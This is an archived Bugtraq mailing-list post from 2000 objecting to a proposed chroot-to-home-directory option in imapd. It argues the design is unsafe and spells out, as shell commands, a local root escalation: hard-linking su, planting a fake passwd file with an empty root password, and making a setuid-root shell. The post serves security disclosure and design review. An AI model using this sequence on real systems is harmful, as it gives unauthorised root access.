|
Bugtraq
mailing list archives
Re: response to the bugtraq report of buffer overruns in imapd LIST command
From: elric () MABELODE IMRRYR ORG (R. C. Dowdeswell)
Date: Mon, 17 Apr 2000 23:02:48 -0700
On 956021099 seconds since the Beginning of the UNIX epoch
Mark Crispin wrote:
The final form of the CHROOT_SERVER code, which will be an option in the next
distributed version, consists of:
if (chroot (home ? home : ANONYMOUSHOME)) return NIL;
home = "/";
And, yes, this will do the necessary chdir().
chroot(2)'ing to a users home directory is rather a bad idea in a lot of
setups. For example, assume that the machine has one large disk and one
partition. Then for a decent number of unices would be vulnerable (on a
shell enabled machine) to:
$ cd
$ mkdir etc
$ ln /usr/bin/su
$ cp /bin/sh .
$ cat root::... > etc/passwd
imap in, get into a chroot(2) jail ain your home dir, get a shell, su.
Then
# chmod 4755 sh
Using chroot in a lot of situations is rather dangerous, and one
must carefully set up the environment that it runs in.
IIRC, the default install of some unices/linuces is to have only one
partition.
== Roland Dowdeswell http://www.Imrryr.ORG/~elric/ ==
== The Unofficial NetBSD Web Pages http://www.Imrryr.ORG/NetBSD/ ==
== The NetBSD Project http://www.NetBSD.ORG/ ==
 By Date 
By Thread
Current thread:
- Re: XFree86 server overflow, (continued)
|
Intro
